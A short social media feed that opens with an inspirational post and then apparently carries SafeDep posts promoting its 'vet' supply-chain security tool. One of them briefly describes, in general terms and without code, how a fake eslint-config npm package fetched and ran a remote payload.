𝐍𝐨 𝐢𝐥𝐥𝐧𝐞𝐬𝐬 , 𝐍𝐨 𝐝𝐢𝐬𝐞𝐚𝐬𝐞 𝐜𝐚𝐧 𝐰𝐞𝐢𝐠𝐡 𝐦𝐨𝐫𝐞 𝐭𝐡𝐚𝐧 𝐭𝐡𝐞 𝐩𝐮𝐫𝐢𝐭𝐲 𝐨𝐟 𝐥𝐨𝐯𝐞 .

The child who wasn't even allowed to sit in the classroom is now everywhere.

Salute to him

🚀 Announcing #GitLab CI/CD Component for #vet ➡️ Seamless integration as a CI Component ➡️ Available in GitLab CI Catalog ➡️ Policy as Code (CEL) ➡️ Protect against vulnerable and malicious "code" 👋 Try now ➡️ safedep.io/introducing-gi… #devops #appsec #opensource #Security

Malware hiding in a fake eslint-config package?😨 This npm package looked harmless until: 🔹Postinstall sets a .env with malicious proxy 🔹Transitive dep fetches payload via env var 🔹Remote server sends & runs base64 JS code How dynamic analysis caught👉safedep.io/digging-into-d…

🔍Not all open source threats are the same. We often confuse with vulnerable libraries with malicious ones but the difference is critical. 🛠 Vulnerable = unintentional bugs, tracked & patchable 💣Malicious = intentional backdoors, harder to detect, devastating impact

🗳️Should Vet offer built-in policies out-of-the-box? So far, Vet lets you define what’s risky using CEL. But now we’re exploring defaults like `--policy builtin:critical-set` Vote & share your thoughts👇 🔗github.com/safedep/vet/di… #DevSecOps #OSS